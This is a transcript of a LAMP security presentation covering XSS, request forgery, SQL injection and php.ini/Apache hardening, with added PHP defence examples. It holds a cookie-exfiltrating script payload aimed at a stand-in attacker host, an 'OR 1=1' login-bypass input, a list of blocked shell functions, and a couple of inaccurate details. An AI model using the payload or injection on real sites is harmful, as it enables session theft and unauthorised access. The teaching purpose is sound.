LAMP security practices
Presentation Transcript

  • LAMP Security Practices
    XSS
    Request Forgeries
    SQL Injection
    Disable PHP, Apache, OS information
    Disable unnecessary modules
    Log PHP errors
    Disable/Limit file uploads
    DoS attack
    Remote Code execution
    Disable dangerous PHP functions
    Limit access to file system
  • XSS
    A hacker posts the below given code snippet in the comment section of the website http://exsite.com:
        Hello Everyone!<script>document.write('<img src="http://evilhacker.org/?' + document.cookie + '">');</script>
    The code will load as it is whenever I open the website http://exsite.com and will transfer my cookie data to the hacker's site (http://evilhacker.org). Note that cookie data may have my login credentials which you as a hacker can use to
  • XSS solution
    All user-submitted content should be filtered and all disallowed characters should be removed. In particular, <, > and all HTML tags should be stripped.
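The slide recommends stripping markup; the added example below (not code from the deck) shows the complementary defence of encoding on output with htmlspecialchars, which makes the payload from the XSS slide inert without discarding the user's text.

```php
<?php
// Added example (not from the slides): encode untrusted comment text for an
// HTML body context instead of only stripping characters. Encoding keeps the
// user's text intact while making any markup in it inert.
function renderComment(string $untrusted): string
{
    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
    // UTF-8 instead of returning "" (which would silently drop the comment).
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input: the payload from the XSS slide.
$comment = 'Hello Everyone!<script>document.write(\'<img src="http://evilhacker.org/?\''
         . ' + document.cookie + \'">\');</script>';

// The browser renders the script as visible text; nothing executes and
// no request is made to the remote host.
echo '<p>' . renderComment($comment) . '</p>', PHP_EOL;
```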
  • Request Forgeries
    Create, update and delete requests should be verified to have originated from your application.
    Ex. Don't use a URL like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signed URL valid for a predefined time. Check the below code:
        // per-session signature tied to the logged-in user, plus the time it was issued
        $_SESSION['signature'] = md5(uniqid(rand(), true) . $username);
        $_SESSION['signature_timestamp'] = time();
        echo "<a href=\"http://mysite.com/photos/delete/photo_id?signature={$_SESSION['signature']}\">";
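A fuller version of the signed, time-limited link idea, as an added example rather than the slide's own code: a per-session secret signs the action, photo id and expiry with an HMAC, and the server checks the signature in constant time before deleting. The URL and the 600-second lifetime are assumed values.

```php
<?php
// Added example (not the slide's code): a time-limited, HMAC-signed delete
// link. A per-session secret signs the action, the photo id and an expiry,
// so a link forged on another site (or a replayed old link) fails the check.
session_start();

const LINK_TTL = 600; // seconds a delete link stays valid (assumed value)

function sessionSecret(): string
{
    if (empty($_SESSION['link_secret'])) {
        $_SESSION['link_secret'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['link_secret'];
}

function signAction(string $action, int $photoId, int $expires): string
{
    $message = "{$action}|{$photoId}|{$expires}";
    return hash_hmac('sha256', $message, sessionSecret());
}

// Build the link to embed in the page (hypothetical URL taken from the slide).
function deleteLink(int $photoId): string
{
    $expires = time() + LINK_TTL;
    $sig = signAction('delete', $photoId, $expires);
    $url = "http://mysite.com/photos/delete/{$photoId}?expires={$expires}&signature={$sig}";
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">Delete</a>';
}

// Verify on the server side before performing the delete.
function isValidDeleteRequest(int $photoId, array $query): bool
{
    $expires = (int) ($query['expires'] ?? 0);
    $given = (string) ($query['signature'] ?? '');
    if ($expires < time()) {
        return false;                       // link has expired
    }
    $expected = signAction('delete', $photoId, $expires);
    return hash_equals($expected, $given);  // constant-time comparison
}
```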
  • SQL Injection
    Ex. Input OR 1=1 in the userid field of the login form. If the server script for authentication uses "SELECT * FROM tblusers WHERE userid = $_GET[userid]", this code will be interpolated to "SELECT * FROM tblusers WHERE userid = OR 1=1", which will result in valid records getting returned from the database.
  • SQL Injection Solution
    Use mysqli_real_escape_string($_GET['userid']) for all user-supplied data. Use prepared statements:
        $statement = $connection->prepare("SELECT * FROM tblusers WHERE userid = ?");
        $statement->bind_param("i", $_GET['userid']);
        $statement->execute();
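An added example (not the slide's code) that wraps the prepared statement in a lookup function and validates the id before it reaches the database: the slide's "OR 1=1" input is rejected by the integer check, and even a value that passes is bound as a parameter rather than spliced into the query. The connection details and column list are assumed; get_result requires the mysqlnd driver.

```php
<?php
// Added example (not the slide's code): look up a user with a prepared
// statement, after validating that the supplied id is really an integer.
// With "OR 1=1" as input, validation fails before any SQL is built; even if
// it passed, the value is bound as a parameter, never spliced into the query.
function findUserById(mysqli $db, string $rawUserId): ?array
{
    $userId = filter_var($rawUserId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($userId === false) {
        return null;                        // rejects "OR 1=1", "", "1abc", ...
    }
    $stmt = $db->prepare('SELECT * FROM tblusers WHERE userid = ?');
    $stmt->bind_param('i', $userId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage (assumed connection parameters; table name from the slide):
// $db = new mysqli('localhost', 'app', 'secret', 'appdb');
// $user = findUserById($db, $_GET['userid'] ?? '');
```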
  • Disable PHP information
    Run the command:
        curl -I http://mysite.com/
        HTTP/1.1 200 OK
        Date: Sat, 28 Apr 2012 09:48:55 GMT
        Server: Apache/2.2.20 (Ubuntu)
        X-Powered-By: PHP/5.3.6-13ubuntu3.6
    The output shows that the site runs on PHP, and the version of PHP as well. Disable the information by setting expose_php = Off in php.ini.
  • Disable Server Information
    Run the command:
        curl -I http://mysite.com/
        HTTP/1.1 200 OK
        Date: Sat, 28 Apr 2012 09:48:55 GMT
        Server: Apache/2.2.20 (Ubuntu)
    The output shows the Apache server, its version, and the OS (Ubuntu). Disable this information by setting
        ServerSignature Off
        ServerTokens Prod
    in the /etc/apache2/conf.d/security file on Ubuntu, or in httpd.conf.
  • Disable unnecessary modules
    Use php -m to check the list of enabled modules. Disable modules like gd if not required. On Ubuntu, go to the folder /etc/php5/conf.d and run:
        sudo mv gd.{ini,disable}
    This will rename the file gd.ini to gd.disable, and the gd module will then not be loaded with PHP.
  • Log PHP errors
    Use the following to stop PHP error messages being displayed to site users:
        display_errors = Off
    Use the following to log PHP error messages to a log file:
        log_errors = On
        error_log = /var/log/httpd/php-error.log
    For real-time monitoring of the PHP error log use:
        tail -f /var/log/httpd/php-error.log
  • Disable File Uploads
    If your site doesn't need file upload functionality, turn it off in php.ini:
        file_uploads = Off
    If your site needs file upload functionality, limit it to the required minimum size:
        file_uploads = On
        upload_max_filesize = 1M
  • DoS attack
    To avoid a script taking an infinite time and bringing down the server, use the following settings:
        max_execution_time = 30
        max_input_time = 30
        memory_limit = 40M
  • Remote Code Execution
    Remote URLs can be opened by PHP functions like fopen, file_get_contents, include and require. These remote URLs are often the cause of code injection and data leakage when programmers do not filter them carefully. To restrict remote file opening:
        allow_url_fopen = Off
        allow_url_include = Off
  • Disable Dangerous PHP functions
    Use the following directive to disable PHP functions that are very powerful, dangerous and not normally required when PHP is running with a web server:
        disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
  • Limit Access to File System
    Use the following to restrict PHP's access to parts of the file system:
        open_basedir = "/var/www/html/"
    The above will not allow PHP access to other parts of the file system, such as /etc or /tmp.
  • Session file path
    Session files must be saved away from the web site folder. Use the following to change the session file location:
        session.save_path = "/var/lib/php/session"
        upload_tmp_dir = "/var/lib/php/upload"
  • Write protect conf and application files
    Use the chattr +i command to write-protect any file:
        chattr +i /etc/php5/php.ini
        chattr +i /etc/mysql/my.cnf
        chattr +i /etc/apache2/apache2.conf
        chattr +i /var/www/html/
    Such files then cannot be modified even by the root user. Use chattr -i to remove the write protection again.
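The php.ini settings from the slides above are easy to set and easy to lose on an upgrade, so an audit that reads the live configuration is useful. The script below is an added example, not part of the deck: it compares ini_get() values against the recommended settings and lists every deviation. It assumes PHP 8 (for match) and should run under the web SAPI, since the CLI forces max_execution_time to 0.

```php
<?php
// Added example (not from the deck): audit the running PHP config against the
// php.ini values the slides recommend. Run it under the web SAPI (e.g. as a
// page) rather than the php CLI, which forces max_execution_time to 0.
$expected = [
    'expose_php'          => 'Off',
    'display_errors'      => 'Off',
    'log_errors'          => 'On',
    'allow_url_fopen'     => 'Off',
    'allow_url_include'   => 'Off',
    'max_execution_time'  => '30',
    'max_input_time'      => '30',
    'memory_limit'        => '40M',
    'upload_max_filesize' => '1M',
    'session.save_path'   => '/var/lib/php/session',
    'upload_tmp_dir'      => '/var/lib/php/upload',
];
$mustBeDisabled = ['exec', 'passthru', 'shell_exec', 'system', 'proc_open', 'popen',
    'curl_exec', 'curl_multi_exec', 'parse_ini_file', 'show_source'];

// ini_get() returns "", "0", "1", "On", "Off"... depending on how a value was set.
function normalize(string $v): string
{
    $v = strtolower(trim($v));
    return match ($v) {
        '', '0', 'off', 'false', 'no' => 'off',
        '1', 'on', 'true', 'yes'      => 'on',
        default                       => $v,
    };
}

function auditIni(array $expected, array $mustBeDisabled): array
{
    $findings = [];
    foreach ($expected as $key => $want) {
        $have = (string) ini_get($key);
        if (normalize($have) !== normalize($want)) {
            $findings[] = "$key: have '$have', want '$want'";
        }
    }
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = 'open_basedir: not set, PHP can read outside the web root';
    }
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    foreach (array_diff($mustBeDisabled, $disabled) as $fn) {
        $findings[] = "disable_functions: $fn is still callable";
    }
    return $findings;
}
echo implode(PHP_EOL, auditIni($expected, $mustBeDisabled) ?: ['All checked settings match']), PHP_EOL;
```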